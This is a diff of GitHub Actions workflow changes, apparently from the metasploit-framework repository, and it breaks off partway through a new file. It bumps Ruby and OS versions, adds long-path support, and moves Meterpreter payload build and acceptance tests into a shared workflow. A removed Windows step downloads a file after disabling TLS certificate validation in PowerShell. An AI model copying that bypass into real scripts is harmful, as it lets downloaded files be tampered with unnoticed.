Merge pull request #20222 from adfoster-r7/pin-setup-ruby-github-action

Pin setup ruby github action
Land #20221 , adds document for copy_of_file.rb and ipv6_multicast_ping.rb
2025-05-22 09:38:56 +01:00 · 2025-05-22 08:32:12 +02:00 · 2025-05-21 23:41:42 +01:00 · 2025-05-21 22:25:22 +00:00 · 2025-05-21 15:17:39 -07:00 · 2025-05-21 21:34:48 +00:00
2184 changed files with 151919 additions and 98151 deletions
@@ -26,11 +26,11 @@ on:
  workflow_dispatch:
    inputs:
      metasploitPayloadsCommit:
-        description: 'metasploit-payloads branch would like to test'
+        description: 'metasploit-payloads branch you want to test'
        required: true
        default: 'master'
      mettleCommit:
-        description: 'mettle branch you would like to test'
+        description: 'mettle branch you want to test'
        required: true
        default: 'master'
  push:
@@ -63,21 +63,23 @@ jobs:
      fail-fast: false
      matrix:
        os:
-          - windows-2019
-          - ubuntu-20.04
+          - windows-2022
+          - ubuntu-latest
        ruby:
-          - 3.0.2
+          - '3.4'
        include:
          # Powershell
-          - { command_shell: { name: powershell }, os: windows-2019 }
-          - { command_shell: { name: powershell }, os: windows-2022 }
+          - { command_shell: { name: powershell }, ruby: '3.4', os: windows-2022 }
+          - { command_shell: { name: powershell }, ruby: '3.4', os: windows-2025 }

          # Linux
-          - { command_shell: { name: linux }, os: ubuntu-20.04 }
+          - { command_shell: { name: linux }, ruby: '3.4', os: ubuntu-latest }

          # CMD
-          - { command_shell: { name: cmd }, os: windows-2019 }
-          - { command_shell: { name: cmd }, os: windows-2022 }
+          - { command_shell: { name: cmd }, ruby: '3.4', os: windows-2022 }
+
+          # TODO: Tests currently fail:
+          # - { command_shell: { name: cmd }, ruby: '3.4', os: windows-2025 }

    runs-on: ${{ matrix.os }}

@@ -126,10 +128,16 @@ jobs:
        with:
          path: metasploit-framework

-      - name: Setup Ruby
-        env:
-          BUNDLE_FORCE_RUBY_PLATFORM: true
-        uses: ruby/setup-ruby@v1
+      # https://github.com/orgs/community/discussions/26952
+      - name: Support longpaths
+        if: runner.os == 'Windows'
+        run: git config --system core.longpaths true
+
+      - name: Setup '${{ matrix.ruby }}' Ruby
+        # Skip for now to ensure CI passes on Windows server 2025 powershell tests
+        #env:
+        #  BUNDLE_FORCE_RUBY_PLATFORM: true
+        uses: ruby/setup-ruby@eaecf785f6a34567a6d97f686bbb7bccc1ac1e5c
        with:
          ruby-version: ${{ matrix.ruby }}
          bundler-cache: true
@@ -175,13 +183,19 @@ jobs:
        if: always()
        run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz

+      # https://github.com/orgs/community/discussions/26952
+      - name: Support longpaths
+        if: runner.os == 'Windows'
+        run: git config --system core.longpaths true
+
      - name: Setup Ruby
        if: always()
        env:
          BUNDLE_FORCE_RUBY_PLATFORM: true
        uses: ruby/setup-ruby@v1
        with:
-          ruby-version: '${{ matrix.ruby }}'
+          # use the default version from the .ruby-version file
+          ruby-version: '.ruby-version'
          bundler-cache: true
          cache-version: 4

@@ -32,7 +32,7 @@ jobs:
  # Ensures that the docs site builds successfully. Note that this workflow does not deploy the docs site.
  build:
    runs-on: ubuntu-latest
-    timeout-minutes: 40
+    timeout-minutes: 60

    strategy:
      fail-fast: true
@@ -45,6 +45,11 @@ jobs:
      - name: Checkout code
        uses: actions/checkout@v4

+      # https://github.com/orgs/community/discussions/26952
+      - name: Support longpaths
+        if: runner.os == 'Windows'
+        run: git config --system core.longpaths true
+
      - name: Setup Ruby
        uses: ruby/setup-ruby@v1
        with:
@@ -33,6 +33,8 @@ on:
      - 'metsploit-framework.gemspec'
      - 'Gemfile.lock'
      - '**/**ldap**'
+      - 'lib/metasploit/framework/tcp/**'
+      - 'lib/metasploit/framework/login_scanner/**'
      - 'spec/acceptance/**'
      - 'spec/support/acceptance/**'
      - 'spec/acceptance_spec_helper.rb'
@@ -44,7 +46,7 @@ on:
 jobs:
  ldap:
    runs-on: ${{ matrix.os }}
-    timeout-minutes: 40
+    timeout-minutes: 60

    strategy:
      fail-fast: true
@@ -72,6 +74,11 @@ jobs:
          docker compose build
          docker compose up --wait -d

+      # https://github.com/orgs/community/discussions/26952
+      - name: Support longpaths
+        if: runner.os == 'Windows'
+        run: git config --system core.longpaths true
+
      - name: Setup Ruby
        env:
          # Nokogiri doesn't release pre-compiled binaries for preview versions of Ruby; So force compilation with BUNDLE_FORCE_RUBY_PLATFORM
@@ -121,6 +128,11 @@ jobs:
        if: always()
        run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz

+      # https://github.com/orgs/community/discussions/26952
+      - name: Support longpaths
+        if: runner.os == 'Windows'
+        run: git config --system core.longpaths true
+
      - name: Setup Ruby
        if: always()
        env:
@@ -29,7 +29,7 @@ on:
 jobs:
  msftidy:
    runs-on: ubuntu-latest
-    timeout-minutes: 40
+    timeout-minutes: 60

    env:
      BUNDLE_WITHOUT: "coverage development pcap"
@@ -38,7 +38,7 @@ jobs:
      fail-fast: true
      matrix:
        ruby:
-          - '3.1'
+          - '3.2'

    name: Lint msftidy
    steps:
@@ -24,12 +24,12 @@ permissions:
 on:
  workflow_dispatch:
    inputs:
-      metasploitPayloadsCommit:
-        description: 'metasploit-payloads branch would like to test'
+      metasploit_payloads_commit:
+        description: 'metasploit-payloads branch you want to test'
        required: true
        default: 'master'
-      mettleCommit:
-        description: 'mettle branch you would like to test'
+      mettle_commit:
+        description: 'mettle branch you want to test'
        required: true
        default: 'master'
  push:
@@ -46,6 +46,7 @@ on:
      - 'modules/payloads/**'
      - 'lib/msf/core/payload/**'
      - 'lib/msf/core/**'
+      - 'test/modules/**'
      - 'tools/dev/**'
      - 'spec/acceptance/**'
      - 'spec/support/acceptance/**'
@@ -56,328 +57,10 @@ on:
 #    - cron: '*/15 * * * *'

 jobs:
-  # Compile Java Meterpreter via docker if required, we can't always do this on the
-  # host environment (i.e. for macos). So it instead gets compiled first on a linux
-  # host, then the artifacts are copied back to the host later
-  java_meterpreter_compilation:
-    name: Compile Java Meterpreter
-    runs-on: ubuntu-latest
-    if: ${{ contains(github.event.pull_request.labels.*.name, 'payload-testing-branch') }}
-
-    env:
-      metasploitPayloadsCommit: ${{ github.event.inputs.metasploitPayloadsCommit || 'master' }}
-
-    steps:
-      - name: Checkout metasploit-payloads
-        uses: actions/checkout@v4
-        with:
-          repository: rapid7/metasploit-payloads
-          path: metasploit-payloads
-          ref: ${{ env.metasploitPayloadsCommit }}
-
-      - name: Build Java and Android payloads
-        run: |
-          mkdir $(pwd)/java-artifacts
-          docker run --rm -w "$(pwd)" -v "$(pwd):$(pwd)" rapid7/msf-ubuntu-x64-meterpreter:latest /bin/bash -c "set -x && cd metasploit-payloads/java && mvn package -Dandroid.sdk.path=/usr/local/android-sdk -Dandroid.release=true -Ddeploy.path=../../java-artifacts -Dmaven.test.skip=true -P deploy && mvn -Dmaven.test.skip=true -Ddeploy.path=../../java-artifacts -P deploy package"
-
-      - name: Store Java artifacts
-        uses: actions/upload-artifact@v4
-        with:
-          name: java-artifacts
-          path: java-artifacts
-
-  # Run all test individually, note there is a separate final job for aggregating the test results
-  test:
-    needs: java_meterpreter_compilation
-    if: always() && (needs.java_meterpreter_compilation.result == 'success' || needs.java_meterpreter_compilation.result == 'skipped')
-
-    strategy:
-      fail-fast: false
-      matrix:
-        os:
-          - macos-13
-          - windows-2019
-          - ubuntu-20.04
-        ruby:
-          - 3.0.2
-        meterpreter:
-          # Python
-          - { name: python, runtime_version: 3.6 }
-          - { name: python, runtime_version: 3.11 }
-
-          # Java
-          - { name: java, runtime_version: 8 }
-          - { name: java, runtime_version: 21 }
-
-          # PHP
-          - { name: php, runtime_version: 5.3 }
-          - { name: php, runtime_version: 7.4 }
-          - { name: php, runtime_version: 8.3 }
-        include:
-          # Windows Meterpreter
-          - { meterpreter: { name: windows_meterpreter }, os: windows-2019 }
-          - { meterpreter: { name: windows_meterpreter }, os: windows-2022 }
-
-          # Mettle
-          - { meterpreter: { name: mettle }, os: macos-13 }
-          - { meterpreter: { name: mettle }, os: ubuntu-20.04 }
-
-    runs-on: ${{ matrix.os }}
-
-    timeout-minutes: 50
-
-    env:
-      RAILS_ENV: test
-      metasploitPayloadsCommit: ${{ github.event.inputs.metasploitPayloadsCommit || 'master' }}
-      mettleCommit: ${{ github.event.inputs.mettleCommit|| 'master' }}
-      HOST_RUNNER_IMAGE: ${{ matrix.os }}
-      SESSION: 'meterpreter/${{ matrix.meterpreter.name }}'
-      SESSION_RUNTIME_VERSION: ${{ matrix.meterpreter.runtime_version }}
-      BUNDLE_WITHOUT: "coverage development"
-
-    name: ${{ matrix.meterpreter.name }} ${{ matrix.meterpreter.runtime_version }} ${{ matrix.os }}
-    steps:
-      - name: Install system dependencies (Linux)
-        if: runner.os == 'Linux'
-        run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz
-
-      - uses: shivammathur/setup-php@c541c155eee45413f5b09a52248675b1a2575231
-        if: ${{ matrix.meterpreter.name == 'php' }}
-        with:
-          php-version: ${{ matrix.meterpreter.runtime_version }}
-          tools: none
-
-      - name: Set up Python
-        if: ${{ matrix.meterpreter.name == 'python' }}
-        uses: actions/setup-python@v5
-        with:
-          python-version: ${{ matrix.meterpreter.runtime_version }}
-
-      - uses: actions/setup-java@v4
-        if: ${{ matrix.meterpreter.name == 'java' }}
-        with:
-          distribution: temurin
-          java-version: ${{ matrix.meterpreter.runtime_version }}
-
-      - name: Install system dependencies (Windows)
-        shell: cmd
-        if: runner.os == 'Windows'
-        run: |
-          REM pcap dependencies
-          powershell -Command "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; (New-Object System.Net.WebClient).DownloadFile('https://www.winpcap.org/install/bin/WpdPack_4_1_2.zip', 'C:\Windows\Temp\WpdPack_4_1_2.zip')"
-
-          choco install 7zip.installServerCertificateValidationCallback
-          7z x "C:\Windows\Temp\WpdPack_4_1_2.zip" -o"C:\"
-
-          dir C:\\
-
-          dir %WINDIR%
-          type %WINDIR%\\system32\\drivers\\etc\\hosts
-
-      # The job checkout structure is:
-      #  .
-      #  ├── metasploit-framework
-      #  └── metasploit-payloads (Only if the "payload-testing-branch" GitHub label is applied)
-      #  └── mettle (Only if the "payload-testing-mettle-branch" GitHub label is applied)
-      - name: Checkout mettle
-        if: ${{ matrix.meterpreter.name == 'mettle' && contains(github.event.pull_request.labels.*.name, 'payload-testing-mettle-branch') }}
-        uses: actions/checkout@v4
-        with:
-          repository: rapid7/mettle
-          path: mettle
-          ref: ${{ env.mettleCommit }}
-
-      - name: Get mettle version
-        if: ${{ matrix.meterpreter.name == 'mettle' && contains(github.event.pull_request.labels.*.name, 'payload-testing-mettle-branch') }}
-        run: |
-          echo "METTLE_VERSION=$(grep -oh '[0-9].[0-9].[0-9]*' lib/metasploit_payloads/mettle/version.rb)" | tee -a $GITHUB_ENV
-        working-directory: mettle
-
-      - name: Prerequisite mettle gem setup
-        if: ${{ matrix.meterpreter.name == 'mettle' && contains(github.event.pull_request.labels.*.name, 'payload-testing-mettle-branch') }}
-        run: |
-          set -x
-          ruby -pi.bak -e "gsub(/${{ env.METTLE_VERSION }}/, '${{ env.METTLE_VERSION }}-dev')" lib/metasploit_payloads/mettle/version.rb
-        working-directory: mettle
-
-      - name: Compile mettle payloads
-        if: ${{ matrix.meterpreter.name == 'mettle' && runner.os != 'macos' && contains(github.event.pull_request.labels.*.name, 'payload-testing-mettle-branch') }}
-        run: |
-          docker run --rm=true --tty --volume=$(pwd):/mettle --workdir=/mettle rapid7/build:mettle rake mettle:build mettle:check
-          rake build
-        working-directory: mettle
-
-      - name: Compile mettle payloads - macOS
-        if: ${{ matrix.meterpreter.name == 'mettle' && runner.os == 'macos' && contains(github.event.pull_request.labels.*.name, 'payload-testing-mettle-branch') }}
-        run: |
-          make TARGET=x86_64-apple-darwin
-          rake build
-        working-directory: mettle
-
-      - name: Checkout metasploit-framework code
-        uses: actions/checkout@v4
-        with:
-          path: metasploit-framework
-
-      - name: Setup Ruby
-        env:
-          BUNDLE_FORCE_RUBY_PLATFORM: true
-          # Required for macos13 pg gem compilation
-          PKG_CONFIG_PATH: "/usr/local/opt/libpq/lib/pkgconfig"
-        uses: ruby/setup-ruby@v1
-        with:
-          ruby-version: ${{ matrix.ruby }}
-          bundler-cache: true
-          cache-version: 5
-          working-directory: metasploit-framework
-
-      - name: Move mettle gem into framework
-        if: ${{ matrix.meterpreter.name == 'mettle' && contains(github.event.pull_request.labels.*.name, 'payload-testing-mettle-branch') }}
-        run: |
-          cp ../mettle/pkg/metasploit_payloads-mettle-${{ env.METTLE_VERSION }}.pre.dev.gem .
-        working-directory: metasploit-framework
-
-      - uses: actions/download-artifact@v4
-        name: Download Java meterpreter
-        id: download_java_meterpreter
-        if: ${{ matrix.meterpreter.name == 'java' && contains(github.event.pull_request.labels.*.name, 'payload-testing-branch') }}
-        with:
-          # Note: Not specifying a name will download all artifacts from the previous workflow jobs
-          path: raw-data
-
-      - name: Extract Java Meterpreter (Unix)
-        if: ${{ matrix.meterpreter.name == 'java' && runner.os != 'Windows' && contains(github.event.pull_request.labels.*.name, 'payload-testing-branch') }}
-        shell: bash
-        run: |
-          set -x
-          download_path=${{steps.download_java_meterpreter.outputs.download-path}}
-          cp -r  $download_path/java-artifacts/data/* ./metasploit-framework/data
-
-      - name: Extract Java Meterpreter (Windows)
-        if: ${{ matrix.meterpreter.name == 'java' && runner.os == 'Windows' && contains(github.event.pull_request.labels.*.name, 'payload-testing-branch') }}
-        shell: bash
-        run: |
-          set -x
-          download_path=$(cygpath -u '${{steps.download_java_meterpreter.outputs.download-path}}')
-          cp -r  $download_path/java-artifacts/data/* ./metasploit-framework/data
-
-      - name: Install mettle gem
-        if: ${{ matrix.meterpreter.name == 'mettle' && contains(github.event.pull_request.labels.*.name, 'payload-testing-mettle-branch') }}
-        run: |
-          set -x
-          bundle exec gem install metasploit_payloads-mettle-${{ env.METTLE_VERSION }}.pre.dev.gem
-          ruby -pi.bak -e "gsub(/'metasploit_payloads-mettle', '.*'/, '\'metasploit_payloads-mettle\', \'${{ env.METTLE_VERSION }}.pre.dev\'')" metasploit-framework.gemspec
-          bundle config unset deployment
-          bundle update metasploit_payloads-mettle
-          bundle install
-        working-directory: metasploit-framework
-
-      - name: Checkout metasploit-payloads
-        if: contains(github.event.pull_request.labels.*.name, 'payload-testing-branch')
-        uses: actions/checkout@v4
-        with:
-          repository: rapid7/metasploit-payloads
-          path: metasploit-payloads
-          ref: ${{ env.metasploitPayloadsCommit }}
-
-      - name: Build Windows payloads via Visual Studio 2019 Build (Windows)
-        shell: cmd
-        if: ${{ matrix.meterpreter.name == 'windows_meterpreter' && matrix.os == 'windows-2019' && contains(github.event.pull_request.labels.*.name, 'payload-testing-branch') }}
-        run: |
-          cd c/meterpreter
-          git submodule init && git submodule update
-          "C:\Program Files (x86)\Microsoft Visual Studio\2019\Enterprise\Common7\Tools\VsDevCmd.bat" && make.bat
-        working-directory: metasploit-payloads
-
-      - name: Build Windows payloads via Visual Studio 2022 Build (Windows)
-        shell: cmd
-        if: ${{ matrix.meterpreter.name == 'windows_meterpreter' && matrix.os == 'windows-2022' && contains(github.event.pull_request.labels.*.name, 'payload-testing-branch') }}
-        run: |
-          cd c/meterpreter
-          git submodule init && git submodule update
-          make.bat
-        working-directory: metasploit-payloads
-
-      - name: Build PHP, Python and Windows payloads
-        if: ${{ (matrix.meterpreter.name == 'php' || matrix.meterpreter.name == 'python' || runner.os == 'Windows') && contains(github.event.pull_request.labels.*.name, 'payload-testing-branch') }}
-        run: |
-          make install-php install-python install-windows
-        working-directory: metasploit-payloads
-
-      - name: Acceptance
-        env:
-          SPEC_HELPER_LOAD_METASPLOIT: false
-          SPEC_OPTS: "--tag acceptance --require acceptance_spec_helper.rb --color --format documentation --format AllureRspec::RSpecFormatter"
-        # Unix run command:
-        #   SPEC_HELPER_LOAD_METASPLOIT=false bundle exec ./spec/acceptance
-        # Windows cmd command:
-        #   set SPEC_HELPER_LOAD_METASPLOIT=false
-        #   bundle exec rspec .\spec\acceptance
-        # Note: rspec retry is intentionally not used, as it can cause issues with allure's reporting
-        # Additionally - flakey tests should be fixed or marked as flakey instead of silently retried
-        run: |
-          bundle exec rspec spec/acceptance/meterpreter_spec.rb
-        working-directory: metasploit-framework
-
-      - name: Archive results
-        if: always()
-        uses: actions/upload-artifact@v4
-        with:
-          # Provide a unique artifact for each matrix os, otherwise race conditions can lead to corrupt zips
-          name: raw-data-${{ matrix.meterpreter.name }}-${{ matrix.meterpreter.runtime_version }}-${{ matrix.os }}
-          path: metasploit-framework/tmp/allure-raw-data
-
-  # Generate a final report from the previous test results
-  report:
-    name: Generate report
-    needs: [test]
-    runs-on: ubuntu-latest
-    if: always() && needs.test.result != 'skipped'
-
-    steps:
-      - name: Checkout code
-        uses: actions/checkout@v4
-        if: always()
-
-      - name: Install system dependencies (Linux)
-        if: always()
-        run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz
-
-      - name: Setup Ruby
-        if: always()
-        env:
-          BUNDLE_FORCE_RUBY_PLATFORM: true
-        uses: ruby/setup-ruby@v1
-        with:
-          ruby-version: '3.3'
-          bundler-cache: true
-          cache-version: 5
-
-      - uses: actions/download-artifact@v4
-        id: raw_report_data
-        if: always()
-        with:
-          # Note: Not specifying a name will download all artifacts from the previous workflow jobs
-          path: raw-data
-
-      - name: allure generate
-        if: always()
-        run: |
-          export VERSION=2.22.1
-
-          curl -o allure-$VERSION.tgz -Ls https://github.com/allure-framework/allure2/releases/download/$VERSION/allure-$VERSION.tgz
-          tar -zxvf allure-$VERSION.tgz -C .
-
-          ls -la ${{steps.raw_report_data.outputs.download-path}}
-          ./allure-$VERSION/bin/allure generate ${{steps.raw_report_data.outputs.download-path}}/* -o ./allure-report
-
-          find ${{steps.raw_report_data.outputs.download-path}}
-          bundle exec ruby tools/dev/report_generation/support_matrix/generate.rb --allure-data ${{steps.raw_report_data.outputs.download-path}} > ./allure-report/support_matrix.html
-
-      - name: archive results
-        if: always()
-        uses: actions/upload-artifact@v4
-        with:
-          name: final-report-${{ github.run_id }}
-          path: |
-            ./allure-report
+  build:
+    uses: ./.github/workflows/shared_meterpreter_acceptance.yml
+    with:
+      metasploit_payloads_commit: ${{ github.event.inputs.metasploit_payloads_commit }}
+      mettle_commit: ${{ github.event.inputs.mettle_commit }}
+      build_metasploit_payloads: ${{ contains(github.event.pull_request.labels.*.name, 'payload-testing-branch') }}
+      build_mettle: ${{ contains(github.event.pull_request.labels.*.name, 'payload-testing-mettle-branch') }}
@@ -44,7 +44,7 @@ on:
 jobs:
  mssql:
    runs-on: ${{ matrix.os }}
-    timeout-minutes: 40
+    timeout-minutes: 60

    services:
      mssql:
@@ -82,6 +82,11 @@ jobs:
      - name: Checkout code
        uses: actions/checkout@v4

+      # https://github.com/orgs/community/discussions/26952
+      - name: Support longpaths
+        if: runner.os == 'Windows'
+        run: git config --system core.longpaths true
+
      - name: Setup Ruby
        env:
          # Nokogiri doesn't release pre-compiled binaries for preview versions of Ruby; So force compilation with BUNDLE_FORCE_RUBY_PLATFORM
@@ -138,6 +143,11 @@ jobs:
        if: always()
        run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz

+      # https://github.com/orgs/community/discussions/26952
+      - name: Support longpaths
+        if: runner.os == 'Windows'
+        run: git config --system core.longpaths true
+
      - name: Setup Ruby
        if: always()
        env:
@@ -44,7 +44,7 @@ on:
 jobs:
  mysql:
    runs-on: ${{ matrix.os }}
-    timeout-minutes: 40
+    timeout-minutes: 60

    services:
      mysql:
@@ -80,6 +80,11 @@ jobs:
      - name: Checkout code
        uses: actions/checkout@v4

+      # https://github.com/orgs/community/discussions/26952
+      - name: Support longpaths
+        if: runner.os == 'Windows'
+        run: git config --system core.longpaths true
+
      - name: Setup Ruby
        env:
          # Nokogiri doesn't release pre-compiled binaries for preview versions of Ruby; So force compilation with BUNDLE_FORCE_RUBY_PLATFORM
@@ -137,6 +142,11 @@ jobs:
        if: always()
        run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz

+      # https://github.com/orgs/community/discussions/26952
+      - name: Support longpaths
+        if: runner.os == 'Windows'
+        run: git config --system core.longpaths true
+
      - name: Setup Ruby
        if: always()
        env:
@@ -33,6 +33,8 @@ on:
      - 'metsploit-framework.gemspec'
      - 'Gemfile.lock'
      - '**/**postgres**'
+      - 'lib/metasploit/framework/tcp/**'
+      - 'lib/metasploit/framework/login_scanner/**'
      - 'spec/acceptance/**'
      - 'spec/support/acceptance/**'
      - 'spec/acceptance_spec_helper.rb'
@@ -44,7 +46,7 @@ on:
 jobs:
  postgres:
    runs-on: ${{ matrix.os }}
-    timeout-minutes: 40
+    timeout-minutes: 60

    services:
      postgres:
@@ -54,7 +56,7 @@ jobs:
          POSTGRES_USER: postgres
          POSTGRES_PASSWORD: password
        options: >-
-          --health-cmd pg_isready
+          --health-cmd "pg_isready --username postgres"
          --health-interval 10s
          --health-timeout 5s
          --health-retries 5
@@ -82,6 +84,11 @@ jobs:
      - name: Checkout code
        uses: actions/checkout@v4

+      # https://github.com/orgs/community/discussions/26952
+      - name: Support longpaths
+        if: runner.os == 'Windows'
+        run: git config --system core.longpaths true
+
      - name: Setup Ruby
        env:
          # Nokogiri doesn't release pre-compiled binaries for preview versions of Ruby; So force compilation with BUNDLE_FORCE_RUBY_PLATFORM
@@ -139,6 +146,11 @@ jobs:
        if: always()
        run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz

+      # https://github.com/orgs/community/discussions/26952
+      - name: Support longpaths
+        if: runner.os == 'Windows'
+        run: git config --system core.longpaths true
+
      - name: Setup Ruby
        if: always()
        env:
@@ -0,0 +1,69 @@
+name: Shared Gem Verify
+on:
+  workflow_call:
+    inputs:
+      test_commands:
+        description: 'Test commands'
+        required: false
+        default: "bundle exec rspec"
+        type: string
+      dependencies:
+        description: 'Array of system dependencies to install'
+        required: false
+        default: "[]"
+        type: string
+
+jobs:
+  test:
+    runs-on: ${{ matrix.os }}
+    timeout-minutes: 40
+
+    strategy:
+      fail-fast: false
+      matrix:
+        ruby:
+          - '3.2'
+          - '3.3'
+          - '3.4'
+        os:
+          - ubuntu-22.04
+          - ubuntu-24.04
+          - ubuntu-latest
+          - windows-2022
+          - windows-2025
+          - macos-13
+
+    env:
+      RAILS_ENV: test
+
+    name: ${{ matrix.os }} - Ruby ${{ matrix.ruby }}
+    steps:
+      - name: Install system dependencies
+        if: ${{ inputs.dependencies != '[]' && !contains(matrix.os, 'macos') && !contains(matrix.os, 'windows') }}
+        run: |
+          dependencies=$(echo '${{ inputs.dependencies }}' | jq -r '.[]')
+          for dep in $dependencies; do
+            sudo apt-get -y --no-install-recommends install "$dep"
+          done
+        shell: bash
+
+      - name: Install system dependencies (Windows)
+        if: ${{ contains(matrix.os, 'windows') && inputs.dependencies != '[]' }}
+        run: |
+          $dependencies = (echo '${{ inputs.dependencies }}' | jq -r '.[]')
+          foreach ($dep in $dependencies) {
+            choco install $dep -y
+          }
+        shell: pwsh
+
+      - name: Checkout code
+        uses: actions/checkout@v4
+
+      - name: Setup Ruby
+        uses: ruby/setup-ruby@v1
+        with:
+          ruby-version: ${{ matrix.ruby }}
+          bundler-cache: true
+
+      - name: Test
+        run: ${{ inputs.test_commands }}
@@ -0,0 +1,90 @@
+name: Shared Gem Verify Rails/PostgreSQL
+on:
+  workflow_call:
+    inputs:
+      test_commands:
+        description: 'Test commands'
+        required: false
+        default: "bundle exec rspec"
+        type: string
+      dependencies:
+        description: 'Array of system dependencies to install'
+        required: false
+        default: "[]"
+        type: string
+
+jobs:
+  test:
+    runs-on: ${{ matrix.os }}
+    timeout-minutes: 40
+
+    strategy:
+      fail-fast: false
+      matrix:
+        ruby:
+          - '3.2'
+          - '3.3'
+          - '3.4'
+        rails:
+          - '~> 7.0.0'
+          - '~> 7.1.0'
+          - '~> 7.2.0'
+        postgres:
+          - '9.6'
+          - '16.8'
+        os:
+          - ubuntu-latest
+
+    env:
+      RAILS_ENV: test
+
+    name: ${{ matrix.os }} - Ruby ${{ matrix.ruby }} - Rails ${{ matrix.rails }} - PostgreSQL ${{ matrix.postgres }}
+    steps:
+      - name: Install system dependencies
+        run: |
+          dependencies=$(echo '${{ inputs.dependencies }}' | jq -r '.[]')
+          for dep in $dependencies; do
+            sudo apt-get -y --no-install-recommends install "$dep"
+          done
+        shell: bash
+
+      - name: Set up PostgreSQL service
+        run: |
+          docker run --name postgres -d -p 5432:5432 \
+            -e POSTGRES_USER=postgres \
+            -e POSTGRES_PASSWORD=postgres \
+            --health-cmd="pg_isready" \
+            --health-interval="10s" \
+            --health-timeout="5s" \
+            --health-retries=5 \
+            postgres:${{ matrix.postgres }}
+
+      - name: Wait for PostgreSQL to be healthy
+        run: |
+          docker exec postgres sh -c 'until pg_isready -U postgres; do echo waiting for postgres; sleep 2; done; echo postgres is ready'
+
+      - name: Checkout code
+        uses: actions/checkout@v4
+
+      - name: Setup Ruby
+        uses: ruby/setup-ruby@v1
+        with:
+          ruby-version: ${{ matrix.ruby }}
+          bundler-cache: true
+
+      - name: Update Rails version
+        run: |
+          # Add the gem explicitly if it doesn't exist
+          if ! grep -q "gem ['\"]rails['\"]" Gemfile; then
+            echo 'gem "rails"' >> Gemfile          
+          fi
+          
+          # Ensure the gem is on the latest version
+          ruby -pi -e "gsub(/gem ['\"]rails['\"](, *['\"].*['\"])?/, \"gem 'rails', '${{ matrix.rails }}'\")" Gemfile
+          bundle update
+          bundle install
+          bundle show rails
+        shell: bash
+
+      - name: Test
+        run: ${{ inputs.test_commands }}
@@ -0,0 +1,405 @@
+name: Shared Meterpreter Acceptance
+on:
+  workflow_call:
+    inputs:
+      # Defaults set as '' will use the current branch as their commit
+      metasploit_framework_commit:
+        description: "metasploit-framework commit to build with"
+        default: ''
+        required: false
+        type: string
+      metasploit_payloads_commit:
+        description: "metasploit-payloads commit to build with"
+        default: ''
+        required: false
+        type: string
+      mettle_commit:
+        description: "mettle commit to build with"
+        default: ''
+        required: false
+        type: string
+      build_mettle:
+        description: "Whether or not to build mettle"
+        default: false
+        required: false
+        type: boolean
+      build_metasploit_payloads:
+        description: "Whether or not to build metasploit-payloads"
+        default: false
+        required: false
+        type: boolean
+
+jobs:
+  # Compile the Meterpreter payloads via docker if required, we can't always do this on the
+  # host environment (i.e. for macos). So it instead gets compiled first on a linux
+  # host, then the artifacts are copied back to the host later
+  meterpreter_compilation:
+    name: Compile Meterpreter
+    runs-on: ubuntu-latest
+    if: ${{ inputs.build_metasploit_payloads }}
+
+    steps:
+      - name: Checkout metasploit-payloads
+        uses: actions/checkout@v4
+        with:
+          repository: rapid7/metasploit-payloads
+          path: metasploit-payloads
+          ref: ${{ inputs.metasploit_payloads_commit }}
+
+      - name: Build Meterpreter payloads
+        run: |
+          mkdir $(pwd)/meterpreter-artifacts
+          docker run --rm -w $(pwd) -v $(pwd):$(pwd) rapid7/msf-ubuntu-x64-meterpreter:latest /bin/bash -c "cd metasploit-payloads/gem && rake create_dir && rake win_copy && rake php_prep && rake java_prep && rake python_prep && rake create_manifest && rake build"
+          cp $(pwd)/metasploit-payloads/gem/pkg/metasploit-payloads-* $(pwd)/meterpreter-artifacts
+
+      - name: Store Meterpreter artifacts
+        uses: actions/upload-artifact@v4
+        with:
+          name: meterpreter-artifacts
+          path: meterpreter-artifacts
+
+  # Run all test individually, note there is a separate final job for aggregating the test results
+  test:
+    needs: meterpreter_compilation
+    if: always() && (needs.meterpreter_compilation.result == 'success' || needs.meterpreter_compilation.result == 'skipped')
+
+    strategy:
+      fail-fast: false
+      matrix:
+        os:
+          - macos-13
+          - windows-2022
+          - ubuntu-latest
+        ruby:
+          - '3.4'
+        meterpreter:
+          # Python
+          - { name: python, runtime_version: 3.8 }
+          - { name: python, runtime_version: 3.11 }
+
+          # Java
+          - { name: java, runtime_version: 8 }
+          - { name: java, runtime_version: 21 }
+
+          # PHP
+          - { name: php, runtime_version: 5.3 }
+          - { name: php, runtime_version: 7.4 }
+          - { name: php, runtime_version: 8.3 }
+        include:
+          # Windows Meterpreter
+          - { meterpreter: { name: windows_meterpreter }, ruby: '3.4', os: windows-2022 }
+          # TODO: Screenshotting behavior fails:
+          # - { meterpreter: { name: windows_meterpreter }, ruby: '3.4', os: windows-2025 }
+
+          # Mettle
+          - { meterpreter: { name: mettle }, os: macos-13 }
+          - { meterpreter: { name: mettle }, os: ubuntu-latest }
+
+    runs-on: ${{ matrix.os }}
+
+    timeout-minutes: 50
+
+    env:
+      RAILS_ENV: test
+      HOST_RUNNER_IMAGE: ${{ matrix.os }}
+      SESSION: 'meterpreter/${{ matrix.meterpreter.name }}'
+      SESSION_RUNTIME_VERSION: ${{ matrix.meterpreter.runtime_version }}
+      BUNDLE_WITHOUT: "coverage development"
+
+    name: ${{ matrix.meterpreter.name }} ${{ matrix.meterpreter.runtime_version }} ${{ matrix.os }}
+    steps:
+      - name: Install system dependencies (Linux)
+        if: runner.os == 'Linux'
+        run: sudo apt-get -y --no-install-recommends install libpcap-dev graphviz
+
+      - uses: shivammathur/setup-php@c541c155eee45413f5b09a52248675b1a2575231
+        if: ${{ matrix.meterpreter.name == 'php' }}
+        with:
+          php-version: ${{ matrix.meterpreter.runtime_version }}
+          tools: none
+
+      - name: Set up Python
+        if: ${{ matrix.meterpreter.name == 'python' }}
+        uses: actions/setup-python@v5
+        with:
+          python-version: ${{ matrix.meterpreter.runtime_version }}
+
+      - uses: actions/setup-java@v4
+        if: ${{ matrix.meterpreter.name == 'java' }}
+        with:
+          distribution: temurin
+          java-version: ${{ matrix.meterpreter.runtime_version }}
+
+      - name: Install system dependencies (Windows)
+        shell: cmd
